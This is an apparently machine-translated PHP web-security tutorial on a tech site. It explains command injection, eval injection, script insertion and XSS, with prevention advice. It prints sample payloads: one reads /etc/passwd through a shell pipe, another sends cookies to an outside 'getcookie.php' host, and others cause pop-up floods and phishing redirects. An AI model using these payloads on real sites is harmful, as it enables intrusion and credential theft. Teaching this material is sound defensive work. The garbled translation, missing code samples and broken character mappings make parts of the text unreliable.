Shulou(Shulou.com)06/03 Report--

This article introduces the relevant knowledge of "how to attack the PHP website and explain the examples of PHP vulnerabilities". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

There are mainly the following attacks on websites aimed at PHP:

1. Command injection (Command Injection)

2. Eval injection (Eval Injection)

3. Client script attack (Script Insertion)

4. Cross-site scripting attacks (Cross Site Scripting, XSS)

5. SQL injection attack (SQL injection)

6. Cross-site request forgery attack (Cross Site Request Forgeries, CSRF)

7. Session session hijacking (Session Hijacking)

8. Session fixed attack (Session Fixation)

9. HTTP responds to split attack (HTTP Response Splitting)

10. File upload vulnerability (File Upload Attack)

11. Directory traversal vulnerability (Directory Traversal)

12. Remote file inclusion attack (Remote Inclusion)

13. Dynamic function injection attack (Dynamic Variable Evaluation)

14. URL attack (URL attack)

15. Form submission spoofing attack (Spoofed Form Submissions)

16. HTTP request spoofing attack (Spoofed HTTP Requests)

Command injection attack

The following five functions can be used in PHP to execute external applications or functions

System, exec, passthru, shell_exec, "(same as shell_exec)

Function prototype

String system (string command, int & return_var)

Commands to be executed by command

Return_var stores the status value after the execution of the command

String exec (string command, array & output, int & return_var)

Commands to be executed by command

Output gets every line string that executes the command output

Return_var stores the status value after executing the command

Void passthru (string command, int & return_var)

Commands to be executed by command

Return_var stores the status value after executing the command

String shell_exec (string command)

Commands to be executed by command

Examples of vulnerabilities

Example 1:

/ / ex1.php

We submit http://www.sectop.com/ex1.php?dir=| cat / etc/passwd

After submission, the command becomes system ("ls-al | cat / etc/passwd")

Eval injection attack

The eval function executes the input string parameters as PHP program code.

Function prototype:

Mixed eval (string code_str) / / eval injection usually occurs when an attacker can control the input string

/ / ex2.php

The http://www.sectop.com/ex2.php?arg=phpinfo(); vulnerability was created when we submitted it.

Dynamic function

The original intention of the programmer is to call An and B functions dynamically, so we submit the http://www.sectop.com/ex.php?func=phpinfo vulnerability.

Prevention method

1. Try not to execute external commands

2. Replace the function of external commands with custom functions or function libraries

3. Use the escapeshellarg function to handle command parameters

4. Use safe_mode_exec_dir to specify the path to the executable file

The esacpeshellarg function escapes any characters that cause the end of a parameter or command, replacing single quotation marks "'" with "\", double quotation marks "", with "\", semicolons ";" with "\;"

Use safe_mode_exec_dir to specify the path to the executable file, and you can put commands that will be used into this path in advance

Safe_mode = On

Safe_mode_exec_di r = / usr/local/php/bin/

Client script implantation

Client script injection (Script Insertion) refers to inserting executable scripts into objects such as forms, pictures, animations, or hyperlink text. When the user opens these objects, the script implanted by the attacker is executed and the attack begins.

HTML tags that can be used as script inserts generally include the following:

1. Page script programs such as javascript and vbscript of tag tags. You can specify the js program code within the tag, or you can specify the URL path of the js file in the src attribute.

2. The object marked by the label. These objects are java applet, multimedia files, ActiveX controls, and so on. The URL path of an object is usually specified in the data property

3. The object marked by the label. These objects are multimedia files, such as swf files. The URL path of an object is usually specified in the src property

4. The object marked by the label. These objects are java applet, and the URL path of the object is usually specified in the codebase property

5. The object marked by the label. The URL path of the web application where you want to process the form data is usually specified in the action property

Attack steps for client script implantation

1. The attacker logs in to the website after registering ordinary users.

2. Open the message page and insert the js code of the attack.

3. Other users log in to the website (including administrators) to browse the contents of this message

4. The js code hidden in the message is executed and the attack is successful.

Example

Database

CREATE TABLE `postmessage` (

`id`int (11) NOT NULL auto_increment

`roomt` varchar (60) NOT NULL default "

`name` varchar (40) NOT NULL default "

`email` varchar (25) NOT NULL default "

`room`mediumtext NOT NULL

`postdate`datetime NOT NULL default '0000-00-0000: 00 00'

PRIMARY KEY (`id`)

) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=' user's message 'AUTO_INCREMENT=69

/ / add.php insert message

/ / list.php message list

/ / show.php displays messages

Submit the message in the picture below

The js script will be executed when browsing this message

Insert while (1) {windows.open ();} infinite pop-up box

Insert location.href= "http://www.sectop.com"; jump phishing page"

Or use other self-constructed js code to attack.

The method of prevention

The htmlspecialchars function is generally used to convert special characters into HTML encoding

Function prototype

String htmlspecialchars (string string, int quote_style, string charset)

String is the string to be encoded

Quote_style is optional. The values can be ENT_COMPAT, ENT_QUOTES, ENT_NOQUOTES. The default value is ENT_COMPAT, which means that only double quotes are converted, not single quotes. ENT_QUOTES, indicating that both double and single quotation marks are to be converted. ENT_NOQUOTES, which means that both double and single quotation marks are not converted

Charset is optional, indicating the character set used

Function converts the following special characters to html encoding:

&-> &

"-->"

'-->'

-> >

Change line 98 of show.php to

Then check the vulnerability page that inserts js.

XSS cross-site scripting attack

XSS (Cross Site Scripting), which means cross-site scripting attack, abbreviated as XSS to distinguish it from stylesheet css (Cascading Style Sheet).

Cross-site scripting is mainly used by attackers to read cookies or other personal data of website users. Once the attacker gets these data, he can log in to the site disguised as this user and gain the privileges of this user.

General steps for cross-site scripting attacks:

1. The attacker sends the http link of xss to the target user in some way.

2. The target user logs in to this website and opens the xss link sent by the attacker during the login.

3. The website has executed this xss attack script.

4. The target user page jumps to the attacker's website, and the attacker obtains the information of the target user.

5. The attacker logs in to the website using the information of the target user to complete the attack.

When a program with a cross-site vulnerability appears, the attacker can construct a similar http://www.sectop.com/search.php?key=_document.location='http://www.hack.com/getcookie.php?cookie='+[xss_clean]; to trick the user into getting the user cookies value after clicking.

Precautions:

Using htmlspecialchars function to convert special characters into HTML coding

Function prototype

String htmlspecialchars (string string, int quote_style, string charset)

String is the string to be encoded

Quote_style is optional. The values can be ENT_COMPAT, ENT_QUOTES, ENT_NOQUOTES. The default value is ENT_COMPAT, which means that only double quotes are converted, not single quotes. ENT_QUOTES, indicating that both double and single quotation marks are to be converted. ENT_NOQUOTES, which means that both double and single quotation marks are not converted

Charset is optional, indicating the character set used

Function converts the following special characters to html encoding:

&-> &

"-->"

'-->'

-> >

Cross-site of $_ SERVER ["PHP_SELF"] variable

In a form, if you submit parameters to yourself, you will use a statement like this

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.